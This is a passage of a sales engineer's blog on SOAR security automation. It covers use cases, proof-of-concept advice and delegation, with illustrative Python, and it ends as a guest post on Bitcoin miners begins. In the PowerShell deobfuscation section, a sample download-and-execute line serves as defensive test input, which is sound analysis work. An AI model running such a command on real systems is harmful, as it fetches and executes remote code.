A big hello from my new SOAR family at Siemplify!

It’s been a good few years helping Demisto fit into PANW (a lot of great people I’ll miss), and now I’m excited to go back to a pure focus on a core technology at Siemplify!

SocOps.rocks has always been a vendor-neutral, personal, unofficial blog about my adventures as a Sales Engineer working in SOAR, and that won’t change.

I still have concepts and use cases to explore and write about, so I hope you will continue to find value in this blog.

Wish me luck 🙂

Andy

UseCases from the field

SOAR vendors (including the one I work for) have lots of material on the most common use cases, so today I will write about some of the more interesting and specific use cases I have built in the wild.

In no particular order:

Scheduled Active Directory Sweeps

Every x hours, SOAR searches for the members of “OU=DomainAdmin” and compares them with the previous result. If someone new has been added, SOAR instantly removes them and creates a Critical severity incident. If the security team approves, SOAR automatically restores that member to the OU and resets the baseline.

Result: Improved monitoring of sensitive roles in AD for unsanctioned accounts.
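A minimal sketch of the sweep comparison, assuming the SOAR platform hands the playbook the current membership as a set of account names each run and stores the previous result as the baseline. The action names (`remove_from_group`, `create_incident`) are hypothetical placeholders, not commands from any real integration.

```python
from dataclasses import dataclass


@dataclass
class SweepResult:
    added: set    # accounts present now but not in the stored baseline
    removed: set  # accounts in the baseline that have since disappeared


def compare_sweeps(baseline: set, current: set) -> SweepResult:
    """Diff the current group membership against the previous sweep."""
    return SweepResult(added=current - baseline, removed=baseline - current)


def plan_actions(result: SweepResult) -> list:
    """For every new member: remove them, then raise a Critical incident.

    Action names are hypothetical placeholders for SOAR integration commands.
    """
    actions = []
    for account in sorted(result.added):
        actions.append(("remove_from_group", account))
        actions.append(("create_incident", account, "Critical"))
    return actions


def approve_member(baseline: set, account: str) -> set:
    """Security team approved: the account goes back in and joins the new baseline."""
    return baseline | {account}


baseline = {"alice.admin", "bob.admin"}
result = compare_sweeps(baseline, {"alice.admin", "bob.admin", "mallory"})
```

Keeping the diff as pure set arithmetic means the "remove, then wait for approval" logic can be tested without touching AD at all.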

Impossible traveler

We tweaked the usual playbook by adding an advanced severity calculation: is the user in the OU “travelling engineer”, and is the alert location a data center? If yes, simply ask their manager for approval.

Result: Fewer false positives.
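The extra severity check could look something like this. It is a sketch under assumptions: the OU list is assumed to come from an Active Directory lookup, the data-center flag from IP/ASN enrichment, and downgrading to "low" is my illustrative choice rather than the customer's exact scoring.

```python
from dataclasses import dataclass, field


@dataclass
class TravelAlert:
    user: str
    severity: str = "high"                       # severity from the usual playbook
    user_ous: set = field(default_factory=set)   # from the Active Directory lookup
    source_is_datacenter: bool = False           # assumed to come from IP/ASN enrichment


def adjust_impossible_travel(alert: TravelAlert) -> tuple:
    """Return (severity, next_step) after the extra checks."""
    if "travelling engineer" in alert.user_ous and alert.source_is_datacenter:
        # Expected behaviour for this kind of user: downgrade and ask the manager
        return "low", "ask_manager_for_approval"
    # Otherwise fall through to the usual impossible-traveller handling
    return alert.severity, "continue_usual_playbook"
```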

Leavers process += Release licence entitlement

Automating the leavers process is quite standard for SOAR (revoke access in Okta, AD and email, collect hardware, etc.).

The interesting twist was to automatically release the leaver’s Office 365 licence, a step that had always been missed before. The organisation had a high turnover of freelancers, so unused licences were accumulating significant costs.

Result: Direct cost saving.

Alert Decoration

A security team had 4 main tools (NTA, EDR, NIDS, SIEM), and every alert meant they had to swivel-chair across all 4 platforms for 10 minutes just to understand it. SOAR ingested alerts from any of the tools, then ran 1 playbook that enriched each alert against all of them.

Within 15 seconds of any alert firing, they had 1 dashboard with EVERYTHING from everywhere, ready to start investigating.

Result: Enormous time saving across every alert type, quicker time to respond, reduced analyst burnout.

Rapid turnover of tier1 staff

An MSSP SOC in Asia had a high staff turnover, as employees trained up and then quickly moved to new jobs for a pay rise. This made it hard to maintain a consistent tier1 service.

I built a playbook to walk an ‘inexperienced’ analyst through a long process.

Result: Increased speed, decreased process deviation (and therefore risk), increased accuracy and customer happiness, reduced need for existing staff to babysit the newcomers.

End-to-end Phishing testing

It’s common to use SOAR to investigate phishing, but I heard of a US customer that actually used SOAR to send out simulated phishing emails at random.

This enabled the customer to correlate how many emails were sent out with how many were reported. It simplified trend analysis: tracking different departments, training effectiveness, recipient response times, etc.

Result: Much tighter end-to-end phishing training.
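Because SOAR both sends and receives, the correlation is a simple join on the email ID. A rough sketch, assuming each sent test email carries a unique ID, a department and a timestamp, and that reported emails can be matched back to that ID (the data shapes are my assumptions):

```python
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import median


def phishing_test_stats(sent, reported):
    """Correlate simulated phishing emails sent with the ones users reported.

    sent:     list of (email_id, department, sent_at) for every test email
    reported: dict of email_id -> reported_at for the ones that were reported
    Returns the report rate and median minutes-to-report per department.
    """
    totals = defaultdict(int)
    delays = defaultdict(list)
    for email_id, department, sent_at in sent:
        totals[department] += 1
        if email_id in reported:
            minutes = (reported[email_id] - sent_at).total_seconds() / 60
            delays[department].append(minutes)
    return {
        dept: {
            "report_rate": len(delays[dept]) / totals[dept],
            "median_minutes_to_report": median(delays[dept]) if delays[dept] else None,
        }
        for dept in totals
    }


t0 = datetime(2024, 1, 1, 9, 0)
example = phishing_test_stats(
    [("e1", "Finance", t0), ("e2", "Finance", t0), ("e3", "HR", t0)],
    {"e1": t0 + timedelta(minutes=30)},
)
```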

Deputise allowlist approval process (and tidy-up)

Using SOAR to manage allow/exemption lists is common. For this use case my customer wanted to deputise the approval process to the employee’s manager (whom we could find by querying the user in Active Directory).

This approach removed the security team bottleneck and resulted in much quicker incident turnaround times (which made everyone happier). And whilst the end users (and their managers) own the process, they don’t actually have access to any of the underlying systems.

The other twist was that the playbook automatically removed the rule after 7 days to keep things tidy.

Result: Quicker turnaround time for change requests, and auto tidy up to reduce long term risk.
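The approval-plus-expiry logic might be sketched like this, assuming the manager has already been resolved upstream (for example from the AD `manager` attribute) and that a scheduled job calls `tidy_up` to find rules to delete. The class and function names are hypothetical.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Optional

ALLOW_TTL = timedelta(days=7)  # the 7-day tidy-up window


@dataclass
class AllowEntry:
    value: str         # e.g. a URL or domain to exempt
    requested_by: str
    approved_by: str   # the requester's manager, resolved from AD upstream
    created: datetime

    def is_expired(self, now: datetime) -> bool:
        return now - self.created >= ALLOW_TTL


def handle_request(value: str, requester: str, manager: str,
                   manager_approved: bool, now: datetime) -> Optional[AllowEntry]:
    """The manager, not the security team, makes the call; nobody gets system access."""
    if not manager_approved:
        return None
    return AllowEntry(value, requester, manager, now)


def tidy_up(entries: list, now: datetime) -> tuple:
    """Split entries into (still_active, to_remove) so the playbook can delete expired rules."""
    active = [e for e in entries if not e.is_expired(now)]
    expired = [e for e in entries if e.is_expired(now)]
    return active, expired
```

Recording `approved_by` on every entry is what keeps the audit trail intact even though the security team never touches the request.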

Enrich existing ticketing systems with generic IT info

Any end user can create incidents in Jira/SNOW. SOAR queries these APIs for specific ticket types, pulls in all the ticket details (IP, hostname, AD username, domain, etc.), then enriches every finding against internal sources and threat intel, and pushes the results back to the same ticket.

This gives all staff instant extra context on every ticket with no effort.

A stretch goal for this playbook could be to notify system owners when their systems are mentioned in a ticket.

Results: Constant 24/7 automatic ticket enrichment supporting the whole business.

Typosquatting Domains

Here SOAR received a daily alert from Recorded Future on “newly registered domains that contain your corporate name”. Each new domain became a separate SOAR incident, which collected screenshots, threat intelligence, WHOIS data and much more straight into the TIP.

Each domain was then presented to an analyst as a 1-page executive summary, allowing the team to simply decide: “false positive”, “confirmed phishing”, “block in the firewall”, “report to Lawyers”, “rescan in 24 hours”, etc.

Results: Better audit history and trend analysis, and the entire daily process was cut from several hours to 15 minutes.

Misconfigured Cloud Infrastructure

Stealthwatch would report on cloud instances with weak configs. The SOAR process would ingest the alert, correlate the machine name with asset management to find the system owner, and email them, asking them to either i) fix the mistake or ii) approve the unexpected config.

The cloud instance was then rescanned, and the security team approved the end user’s decision.

Results: Massive time saving, plus a complete audit log of who approved each action (reducing political risk to the security team).

Deobfuscate PowerShell

A customer received numerous EDR alerts about obfuscated PowerShell. The SOAR playbook ingested each alert, walked the entire process tree (process names, PIDs, etc.), found all PowerShell commands, Base64-decoded them, passed the strings through a PowerShell deobfuscator, then performed IOC extraction and enrichment.

The entire incident was then presented to the analyst, who checked it over and decided whether the command was innocent or ‘interesting’ and needed further investigation.

Result: Big time saving of a very tedious process
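The Base64 step is the easiest to illustrate. PowerShell’s `-EncodedCommand` (commonly abbreviated to `-e`, `-ec` or `-enc`) takes Base64 over UTF-16LE text. This sketch only covers that decode plus a naive regex IOC extraction; a real deobfuscator and proper IOC extraction/enrichment would replace the regexes, and all the names are illustrative.

```python
import base64
import re

# -EncodedCommand and its abbreviations; the payload is Base64 over UTF-16LE text
FLAG_RE = re.compile(r"-(e[a-z]*)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def decode_encoded_command(cmdline: str):
    """Return the decoded script from a powershell command line, or None."""
    for flag, payload in FLAG_RE.findall(cmdline):
        flag = flag.lower()
        # Accept -ec or any prefix of "encodedcommand"; skips e.g. -ExecutionPolicy
        if flag == "ec" or "encodedcommand".startswith(flag):
            try:
                return base64.b64decode(payload).decode("utf-16-le")
            except ValueError:  # bad Base64 or bad UTF-16 both subclass ValueError
                continue
    return None


def extract_iocs(script: str) -> dict:
    """Naive regex IOC extraction, a stand-in for a proper extraction/enrichment step."""
    return {
        "urls": sorted(set(URL_RE.findall(script))),
        "ipv4": sorted(set(IPV4_RE.findall(script))),
    }


script = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
cmd = "powershell.exe -nop -w hidden -enc " + base64.b64encode(script.encode("utf-16-le")).decode("ascii")
decoded = decode_encoded_command(cmd)
iocs = extract_iocs(decoded)
```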

Highly sensitive network – Managing alerts

One customer had a highly sensitive network with almost no connectivity to the corporate network. When an alert was raised in the sensitive network, SOAR pulled in all related alerts, enrichment, logs, correlation, etc. This ‘case study’ was converted into a report, zipped, then queued for a scheduled (and heavily scrutinized) upload out of the sensitive network to the security team for investigation.

Result: Simpler process and much faster time to investigate whilst still complying with internal process

PDF Threat Report -> Microsoft Defender syntax

A security team received many cyber threat reports full of IOCs. For each report they had to extract every IOC and convert them into a very specific “Windows Defender” query syntax to initiate a network-wide scan.

The SOAR playbook we built scanned the PDF, extracted every IOC, formatted them into Microsoft Defender syntax, and sent the command to the network team over Slack to initiate the scan. The network team could then reply with different options to trigger different responses from the security team.

Results: Fewer missed IOCs, much quicker turnaround on hunting
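The post doesn’t say exactly which Defender syntax was used, so as an assumption this sketch targets Microsoft Defender for Endpoint advanced hunting (KQL), using the `DeviceNetworkEvents` (`RemoteIP`) and `DeviceFileEvents` (`SHA256`) tables. It assumes the PDF text has already been extracted, and only handles IPv4 addresses and SHA-256 hashes.

```python
import re

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
SHA256_RE = re.compile(r"\b[A-Fa-f0-9]{64}\b")


def extract_iocs(report_text: str) -> dict:
    """Pull IOCs out of text already extracted from the PDF (PDF parsing not shown)."""
    text = report_text.replace("[.]", ".")  # re-fang the common "1.2.3[.]4" style
    return {
        "ipv4": sorted(set(IPV4_RE.findall(text))),
        "sha256": sorted({h.lower() for h in SHA256_RE.findall(text)}),
    }


def kql_list(values) -> str:
    # Quote each value as a KQL string literal, escaping backslashes and quotes
    return ", ".join('"' + v.replace("\\", "\\\\").replace('"', '\\"') + '"' for v in values)


def to_hunting_queries(iocs: dict) -> list:
    """Build one advanced hunting query per IOC type that has values."""
    queries = []
    if iocs["ipv4"]:
        queries.append(f"DeviceNetworkEvents | where RemoteIP in ({kql_list(iocs['ipv4'])})")
    if iocs["sha256"]:
        queries.append(f"DeviceFileEvents | where SHA256 in ({kql_list(iocs['sha256'])})")
    return queries
```

The resulting strings are what the playbook would post to Slack for the network team.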

Validating service account usage

Members of IT staff were permitted to use service accounts, but validating/auditing each privilege escalation against the source user was a big burden on the SOC team.

A SOAR playbook was created to watch for service account usage/privilege escalation, enrich the log to find the employee, and finally send them a simple yes/no question. If the end user acknowledged it within 24 hours, the ticket was closed; if they denied it or failed to respond in time, the ticket was escalated to the SOC team to investigate further.

Result: A vital security control now takes no effort to perform, and they have a completely automatic process with dashboards, escalation, etc.
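The yes/no-with-timeout rule is small enough to write out in full. A sketch, assuming the playbook re-evaluates the ticket periodically and that the answer arrives as "yes", "no" or nothing; the function name is hypothetical.

```python
from datetime import datetime, timedelta
from typing import Optional

RESPONSE_WINDOW = timedelta(hours=24)


def service_account_decision(asked_at: datetime, answer: Optional[str],
                             answered_at: Optional[datetime], now: datetime) -> str:
    """Decide what to do with a service-account usage ticket.

    answer is "yes", "no" or None (no reply yet). Returns "close", "escalate" or "wait".
    """
    if answer == "yes" and answered_at is not None and answered_at - asked_at <= RESPONSE_WINDOW:
        return "close"      # the employee confirmed it was them, in time
    if answer == "no":
        return "escalate"   # the employee denies it: the SOC investigates
    if now - asked_at > RESPONSE_WINDOW:
        return "escalate"   # no (timely) answer within 24 hours
    return "wait"
```

Treating a late "yes" the same as silence keeps the control strict: only a timely confirmation closes the ticket.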

Daily infrastructure testing, lots of devices

1000+ WAPs, and every day some of them crash. Solution: Ingest the device statuses from Aruba, then for each failed WAP identify the physical site and which floor it is on. Then identify the asset owner, log a ticket in SNOW, assign it to the right team, etc.

Taking it further, we discussed SOAR knowing whether the onsite staff would need documents/help (e.g. if the WAP was hidden in the roof).
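A rough sketch of the per-WAP ticket step, assuming the Aruba statuses have already been ingested as a dict and that asset management provides site, floor and owning team per WAP. The ticket field names are modelled on ServiceNow’s incident table (`short_description`, `assignment_group`); the fallback group name is a hypothetical placeholder.

```python
def wap_tickets(statuses: dict, inventory: dict) -> list:
    """Build one ticket per WAP reported down.

    statuses:  wap_id -> "up" | "down" (as ingested from Aruba)
    inventory: wap_id -> {"site", "floor", "owner_team"} from asset management
    WAPs missing from the inventory go to a hypothetical fallback queue.
    """
    tickets = []
    for wap_id in sorted(statuses):
        if statuses[wap_id] != "down":
            continue
        asset = inventory.get(wap_id, {})
        tickets.append({
            "short_description": f"WAP {wap_id} down",
            "site": asset.get("site", "unknown"),
            "floor": asset.get("floor", "unknown"),
            "assignment_group": asset.get("owner_team", "network-triage"),
        })
    return tickets
```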

MSSP: Reviewing user lockouts

SOAR automated the enrichment of each lockout alert, using both the alert itself and the rest of the business. In addition, the enrichment would check:

  • Many alerts against one account on one box: likely an attack
  • Few alerts on different boxes: likely a false positive
  • Many alerts on many boxes: password spraying

Result: Time saving (and improved service). Some customers were facing 125 lockouts in 3 days, so this adds up quickly.
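The three rules above translate almost directly into code. A sketch, assuming lockout alerts are grouped per time window as (account, host) pairs; the threshold of 10 for "many" is a hypothetical tuning value, not one from the engagement.

```python
def classify_lockouts(events: list, many: int = 10) -> str:
    """Rough triage of account lockouts in one time window.

    events: (account, host) pairs, one per lockout alert.
    The threshold for "many" is a hypothetical tuning value.
    """
    accounts = {account for account, _ in events}
    hosts = {host for _, host in events}
    if len(events) >= many and len(accounts) == 1 and len(hosts) == 1:
        return "likely attack"          # many alerts, one account, one box
    if len(events) >= many and len(hosts) > 1:
        return "password spraying"      # many alerts across many boxes
    if len(events) < many and len(hosts) > 1:
        return "likely false positive"  # a few alerts on different boxes
    return "needs analyst review"       # anything the simple rules don't cover
```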

MSSP: Managing IOC to EDR

Every bad inbound IOC detection needs pushing to EDR tenants, and whilst some tenants are happy with auto blocking, some are not.

We built a playbook that enriches each tenant (against SNOW, etc.) to find each customer’s accepted risk profile, then pushes IOCs automatically to the customers that allow it and prompts an analyst for the tenants that don’t.

Result: streamlined process, quicker time to block, improved security service.
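The routing decision is essentially a split on each tenant’s risk profile. A sketch, assuming the profile lookup from SNOW returns a dict with a hypothetical `auto_block` flag; tenants with no profile fall back to analyst approval, which seemed the safer default to me.

```python
def route_ioc(ioc: str, tenant_profiles: dict) -> dict:
    """Split EDR tenants into auto-push and analyst-approval lists for one IOC.

    tenant_profiles: tenant -> risk profile looked up from SNOW (or wherever it lives),
    e.g. {"auto_block": True}. Tenants without a profile default to analyst approval.
    """
    push_now, ask_analyst = [], []
    for tenant in sorted(tenant_profiles):
        profile = tenant_profiles[tenant] or {}
        if profile.get("auto_block", False):
            push_now.append(tenant)
        else:
            ask_analyst.append(tenant)
    return {"ioc": ioc, "push_now": push_now, "ask_analyst": ask_analyst}
```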

Where do I stop? I could go on for days! But I hope this has sparked a little imagination 🙂

Andy

Apparently we’re not meant to Automate Bonusly…

Everyone has a low-importance, process-driven responsibility in their job that always gets forgotten….

…for me that’s Bonusly.

Every month, from my employer, I am allocated 100 ‘Bonusly points’ which I can distribute to employees as a way of thanking them for going above and beyond to help.

Most months I spend them all before the end of the month, but sometimes it slips my mind. This sounds like a job for SOAR:

  • Scheduled for the end of the month
  • Prescriptive in nature (aka tedious and distracting)
  • I need to visualise at the end
  • APIs are available

High Level Needs

I only want to automate unused points, so I will run the process at the end of the month (on the 30th) to spend anything still unspent.

There is a list of people who help me a LOT on Slack, so I want to distribute any remaining points among them.

I will spend 10 points per appreciation, and repeat until fewer than 10 points remain.

There are many ways to build this, but for today I want to keep the design as simple as possible.

We're gonna need a montage (South Park meme)
(joke, I can’t afford a montage clip)

Implement: Playbook

Each time it runs, the playbook checks whether I have at least 10 points left to give; if so, it selects a user and submits the Bonusly request.

You can see in this Playbook every task has the “lightning” symbol which shows each task is fully automated, i.e. no manual steps/validation.
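In the playbook each scheduled run makes at most one give; the loop below simulates those repeated runs in one go. It’s a sketch under assumptions: round-robin recipient selection is my choice (the post only says "select a user"), and the actual Bonusly API call is deliberately left out.

```python
POINTS_PER_GIVE = 10


def plan_bonusly_gives(balance: int, helpers: list) -> tuple:
    """Simulate repeated playbook runs: give 10 points per run while at least 10 remain.

    Round-robin recipient selection is an assumption.
    Returns (list of (recipient, points), leftover balance).
    """
    gives = []
    run = 0
    while balance >= POINTS_PER_GIVE and helpers:
        recipient = helpers[run % len(helpers)]
        gives.append((recipient, POINTS_PER_GIVE))
        balance -= POINTS_PER_GIVE
        run += 1
    return gives, balance
```

With a leftover balance of 35 and two helpers, this gives 10, 10 and 10 points and leaves 5, which stay unspent because they are below the 10-point threshold.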

Implement: Scheduling

As I only want to spend “unused” points, I only want to trigger this at specific times, so I will use the advanced CRON timing.

For anyone that doesn’t know CRON, this essentially says:

  • Run every 30 minutes
  • Between 09:00 and 14:00
  • On the 30th of every month
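To sanity-check that schedule, here is Python that enumerates the run times it describes. It doesn’t reproduce the cron expression itself, and it assumes "between 09:00 and 14:00" includes 14:00. It surfaces two useful facts: the window gives 11 runs, enough to spend a 100-point allowance at 10 points per run, and February has no 30th, so nothing runs that month.

```python
import calendar
from datetime import datetime, timedelta


def scheduled_runs(year: int, month: int, day: int = 30,
                   start_hour: int = 9, end_hour: int = 14, step_minutes: int = 30) -> list:
    """Every run time in one month: every 30 minutes, 09:00-14:00 inclusive, on the 30th."""
    days_in_month = calendar.monthrange(year, month)[1]
    if day > days_in_month:
        return []  # e.g. February has no 30th, so the schedule never fires that month
    t = datetime(year, month, day, start_hour, 0)
    end = datetime(year, month, day, end_hour, 0)
    runs = []
    while t <= end:
        runs.append(t)
        t += timedelta(minutes=step_minutes)
    return runs


runs = scheduled_runs(2024, 1)
```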

Dashboarding / Visibility

I always love creating dashboards, because with automation it’s easy to lose visibility.

So I have tweaked my incident layout for a quick view on each Bonusly ‘Give’

And built a mini dashboard for trends over time (distribution is sporadic and uneven as I develop the usecase):

Results

Love: helpful people, saying thank you, SOAR

Hate: Wasting time, losing my allowance

Andy

Does Homebrew SOAR scale?

I don’t believe it does.

Short answer

“A lazy sysadmin is a good sysadmin”.

For 30 years people have been writing scripts to do our job for us, and it’s still a mess.

  • Different scripts, with different standards/styles
  • Hardcoded cleartext passwords
  • Running on different servers
  • Maintained by different teams
  • With no documentation
  • No error handling
  • No RBAC
  • No reporting/visibility
  • And when that employee leaves the organisation? All knowledge is lost

We’ve had the ability to script for 30 years and we are still in this mess.

Long Answer

Engineers typically design and build “bottom up” (rather than project owners who design “top down”).

“It took only 20 minutes to get product A talking to product B”? High Five!!!


But as you add more technologies, the number of integration permutations (not just combinations) explodes, growing with the square of the number of technologies. 2 technologies means 2 bits of code (1 each way); 5 platforms becomes 20. You have 20 technologies to integrate? That’s 380, and now get ready for REST, SOAP, JSON, XML, OAuth, etc.
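The arithmetic behind those numbers: with n technologies there are n × (n − 1) one-way integrations (ordered pairs) but only n × (n − 1) / 2 unordered pairs. That growth is quadratic rather than truly exponential, but it still gets out of hand quickly. A quick check with Python’s standard library:

```python
from itertools import combinations, permutations


def integration_counts(n: int) -> tuple:
    """(unordered pairs, one-way integrations) between n technologies."""
    techs = range(n)
    pairs = sum(1 for _ in combinations(techs, 2))    # n * (n - 1) / 2
    one_way = sum(1 for _ in permutations(techs, 2))  # n * (n - 1)
    return pairs, one_way


for n in (2, 5, 20):
    print(n, integration_counts(n))
```

This prints `(1, 2)`, `(10, 20)` and `(190, 380)`, matching the 2 and 20 figures above.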

As you start processing lots of incidents, you realise you have lost overall visibility, so you need to engineer in dashboards, reports and alerting, all of which need to be both engineer-friendly and CISO-friendly.

Then you realise that to investigate and manage specific incidents you need full case management, with chat, attachments, SLA timers, ownership, team members, etc.

Then you realise the platform holds API keys (aka keys to the kingdom) so it needs encryption and hardening. Does this now require pentests and code reviews?

You then discover that repeatable playbook design requires UI friendly building and debugging for tasks, conditions, loops, subplaybooks, etc

As the platform grows, you realise that integrating a workflow with people is equally crucial (questions over Slack, email, questionnaires), so you need to bake in communication tasks, data collection, non-repudiation, etc.

Then you realise that threat intel is a huge part of incident enrichment and decision making, so you need to double up your case management to also represent each indicator type.

The business then wants to get value from this huge investment by opening it up to more than just the SOC, but the interface isn’t very user-friendly, so you have to redesign it.

Now that everyone has access, you need to retrospectively add RBAC to everything.

On a random Sunday night someone updates a key piece of technology without informing you. The vendor API has changed from version 6 to version 7, your playbooks don’t work, and you have to start programming very quickly.

Then, to really annoy you, management strategically changes vendor alliances, so all your API calls need rewriting.

…and so much more, starting to get the idea?

None of that is considered when the engineer first puts pen to paper and says “give me 20 minutes to get the basics working”.

We recently won a POC with a customer who had been managing a homebrew for years (compared to full SOAR it was tiny), and they were simply exhausted from maintaining it. Every time they wanted to tweak anything they had to essentially rewrite huge parts from scratch… When I showed them how SOAR already handles all the basics, they realised they were fighting a losing battle.

Andy

Best Practice: How to POC/POV SOAR

“Best Practice”: commercial or professional procedures that are accepted or prescribed as being correct or most effective.

Over the last 2-3 years I’ve carried out a LOT of SOAR workshops and POCs. Here are my findings:

Maturity of environment/processes/team

There are no prerequisites to using SOAR… however… SOAR was created to fix the pain. If the team does not suffer pain (yet), the value of SOAR might be hard to convey.

  • Has the prospect performed any process enough times to truly understand it? i.e. Are processes defined and understood?
  • Has the prospect identified which processes cause the most issues, and which issues (analyst burnout, process deviation, slowness, etc.)?
  • Has the prospect tried to create homebrew automation? And how long did they last before they realised it doesn’t scale? (Unless you have the resources of Netflix, your homebrew won’t scale.)

POC Success Criteria

Your SOAR project likely needs some executive sign-off, and the exec team’s drivers are typically similar to the technical team’s but positioned differently.

Usually the technical team want to see:

  • Speeding up time to visibility
  • Reduce clicks to resolution
  • Automate challenging processes
  • Time savings / quicker results to business
  • A reduction in stress
  • Reduced errors/deviation
  • Process enforcement
  • Alert consolidation
  • Deliver more with same team size
  • Deputise(/delegate) processes to other teams
  • More examples here

Whereas I often see executive teams have the same concerns but framed differently:

  • Strategically over the next 5 years we need to offer more services (either internal, or to customers) therefore we need to prove that SOAR can automate new business flows allowing expanded/improved service delivery…. aka automate processes
  • To comply with regulation xyz we need certain processes to be enforced, with full and perfect audit records…. aka process deviation and logging
  • The cost of the platform is compared directly against the cost of increasing team size (which is hard due to the supply/demand of skilled IT analysts/workers). Therefore for every $xxx of platform cost, you need to automate yyy hours… aka time savings
  • etc

Interestingly, in 3 years I have never heard a company say “we need to use automation to decrease this team size to save money”. It’s always the opposite: we need to grow but we’re simply unable to. It’s about doing more with what you have, not doing the same with less.

With these high-level goals identified, we know whether the POC will focus on Automation vs Case Management vs ChatOps vs TIP/TIM vs reporting and visibility vs ….

Preparation and Delays

By far, the biggest delay in any POC is internal preparation. For each technology that SOAR integrates with, we need a password/API key/private cert, and we need network access. It’s not always the security/SOC/IT team who owns every technology, which often leads to big process delays. The same goes for firewall rules, network access, etc. Be prepared to power through.

The good news is I can fall back to other options if integrating with your technology isn’t possible. Here are some examples:

  • If your internal ServiceNow team is unwilling/unable to create a dummy account for testing, create a developer instance directly with ServiceNow. Their dev instances only last for 10 days but are great to use and abuse to prove the functionality
  • If you can’t integrate with technology <ABC> directly, consider ingesting logs via existing technology paths, e.g. SIEM
  • If integrating with Active Directory is tough, ask your SOAR vendor to provide a mock integration that generates/consumes fake data as a way to show the workflow processing and completing

Think Blueberries not Watermelons

To begin with, I strongly recommend small use cases that save you 10-20 minutes of work, multiple times a day. These quick wins are easier to design and deploy, and you’ll notice the impact more. Small and often, think Blueberries.

As SOAR matures, start to consider use cases that are huge but infrequent; there is still value here, but it isn’t always as quick to realise. Infrequent and huge, think watermelons.

Think C-3PO not Skynet

You might be ready for automation, but elements of the business might not be. I also find many companies don’t understand their processes as well as they thought they did.
Therefore when designing a use case, I don’t plan for SOAR to do 100% of the work and make 100% of the decisions. That would be Skynet, and Arnold Schwarzenegger will teleport from the future to stop you.

Start smaller, with SOAR performing the laborious work but not making any decisions, and use manual checks at every important step. Remember, SOAR should take the arduous work away from you, allowing you to merely supervise, authorise and guide workflows.

Think C-3PO

Think Avengers, not Thanos

Each time you acquire a new technology you have to decide which vendor is best. I’ve often seen companies say “product A had 92% detection, product B had 93% detection, therefore B is better and we shall buy their warez”

How often do you rate a technology on its ability to work as part of a team?

In my experience, the best setups emerge when we get multiple technologies working together as a team getting the best out of each other, like the Avengers.

A technology that is 1% stronger than each of its competitors, but can only be operated by a human analyst, will lose out to teamwork, just like Thanos did.

I hope this is helpful?

Andy

Deputising vs Delegating in SOAR

Deputization Versus Delegation
Delegating means “do this task and bring it back to me.” Deputizing means “own this process and bring me the results.”

For this article I’m going to look first at a DevOps use case, then a workload use case, and lastly a SOC use case.

Use Case: DevOps deputising an entire process to Me

As a Sales Engineer a common workload I have is creating many cloud based POC environments. The process is quite long, and involves managing multiple platforms:

  • Deploy Virtual machine instance
  • Patch and update the software image
  • Configure basic settings
  • Allocate IP, synchronise DNS, tag the machine
  • Update asset management and billing records
  • ….and lots more

It’s a long process with lots of change management, and it touches lots of other platforms. Our DevOps team don’t have the resources to manage this for all the SEs around the world, but they also don’t want to give me access to all the underlying platforms. So how do we manage this?

Answer: Deputise the process to the SE using automation to handle the workflow

Imagine a form that I can complete, that asks some very simple questions:

This data is fed into the “New Investigation form”:

  • Owner: Allows SOAR to automatically find and ask my manager for approval
  • AWS Region: Tells the AWS API calls where to create the POC
  • Company name: Used for billing/asset/inventory control
  • etc

In the next 4-5 minutes the playbook does all the processing for me: configuring, installing, modifying, tracking, etc. As this work is done for me, I can concentrate on more important things elsewhere.

This is a great example of DevOps safely deputising a process to the SE team. I have no access to any equipment, yet 24/7/365 with no advance warning I can spin up my own POC environment in 5 minutes because I run the process but DevOps own it. DevOps only need to be involved where something goes wrong.

Consider your own work environment, are there any services your team would like to offer the business in a quicker/safer way without losing control?

Use Case: Delegate a single task

When running a POC I sometimes need help from an architect to complete 1 step of the process. I don’t want them to own the entire process, but I do desperately need their help for one bit.

A playbook can, automatically or at your choice (as in this example), assign specific tasks to a different team or a specific person.

If I choose “Assign Architect”, the playbook takes the right-hand path and assigns the task to the Architect team. The investigation is now assigned to them, and only their user/team/role can progress through this task.

As this task belongs to a different team, I don’t want their workload to affect my SLA, so let’s create a specific SLA for just this task:

With Delegation, I own the overall process, but a particular task can be automatically given to another member of the team (with their RBAC, SLA), or even a completely different team, but the ownership of the workflow, all the graphs/dashboards and reports show that the work is still mine.

Use case: False positives and tuning a signature/policy: Delegate or Deputise?

Imagine a noisy IDS signature creating many False Positives every day, I need the signature/policy improving, and that responsibility might be with a different person/team.

This could easily be built as a simple delegation: a single task in a playbook, assigned to someone else, that branches off the main workflow:

Delegation is fine here; it would work.

But if we change this and Deputise it we can get a more controlled process:

As the analyst, when I answer “Yes” the current investigation creates a new investigation and assigns it to someone else, but I can still track its progress from the original ticket, my own ticket.

In the below screenshot, I am “AndyAdmin” and I own the ticket to investigate the alert. From here I can see that a new incident was created to Tune the alert, I can see it was assigned to Laura and I can monitor the status.

This way:

  • The original analyst doesn’t have to wait for tuning before they can close the investigation
  • Monthly reports correctly show 2 separate tickets by the team
  • Each team has cleaner/simpler SLAs and dashboards
  • We can have 1-to-many relationships between investigations for tuning
  • The tuning investigation can be reopened more cleanly (as it is separate from the original investigation)
  • etc

This isn’t going to win a Nobel Prize, but it is an effective way to automate the inefficient way most organisations handle assigning tickets, tasks, delegating, etc across all the different teams.

Useful?

Andy


Auto validating Bitcoin Miners with SOAR [Guest Post]

They say the best way to learn is by doing, and nothing proves this better than technology. As a relatively new SE at Palo Alto, I knew that if I tried to learn XSOAR by watching hours of videos and reading articles, I would never build the muscle memory that comes from repetition. With that in mind, I decided to find a use case for it and then work out how to make it do that.

Experimenting with automated jobs to block and allow kids’ games taught me the basics of jobs and incidents, and getting alerts when high-risk URL categories were accessed taught me how to get log data into XSOAR. Next I wanted something useful: something that would increase my security and automate a job that I simply would not have the time to carry out myself.

That Golden Goose came in the form of Bitcoin. Now, I know this sounds like the opening line of almost every crypto shill you’ve ever heard, but rest assured I’m not going to try to sell you unicorns and crypto rainbows. I run a Bitcoin node at home. I don’t make any profit from it, but I believe in Bitcoin, and running a node to validate transactions on the blockchain helps the community and ultimately the currency itself.

The Problem?

